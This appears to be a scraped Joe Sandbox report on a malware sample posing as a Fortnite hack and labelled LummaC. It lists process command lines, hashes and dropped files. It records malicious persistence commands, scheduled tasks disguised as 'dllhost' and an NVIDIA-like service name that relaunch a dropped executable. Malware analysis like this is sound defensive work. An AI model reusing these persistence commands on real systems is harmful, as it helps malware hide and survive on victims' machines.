Commandline:	"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Imagebase:	0xff0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Imagebase:	0xff0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6afb20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6afb20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Imagebase:	0x4e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Imagebase:	0x4e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FortniteHack.exe1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Dllhost\WinRing0x64.sys

C:\ProgramData\Dllhost\winlogson.exe

C:\ProgramData\HostData\logs.uce

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_FortniteHack.exe_77e1171ff451da10852a4338d6cafd15dac29fca_626e8a90_b8a231f8-c2d9-4ed8-8bea-c60f0fa0f86a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB381.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB43D.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB47D.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
FortniteHack.exe1.exe